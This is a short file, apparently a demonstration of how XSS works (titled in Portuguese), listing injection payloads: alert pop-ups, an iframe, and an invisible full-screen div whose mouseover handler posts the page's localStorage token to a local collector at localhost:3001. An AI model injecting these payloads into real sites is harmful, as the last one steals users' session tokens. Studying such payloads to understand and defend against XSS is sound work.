Exemplo de funmcionamento do ataque XSS
<iframe src="https://www.cristianoprogramador.com/">
<img src="1https://www.cristianoprogramador.com/img/profile.jpg">
<button onclick="Alert Hackeado">Click me</button>
<div onmouseover="alert('injetado!')" style="width:100vw; height: 100vh; color:transparent"> </div>
<script>alert('123')</script>
<div onmouseover="axios.post('http://localhost:3001/', {}, {headers:{Authorization:localStorage['token']} }).then((result)=>{})" style="width:100vw; height: 100vh; color:transparent"></div>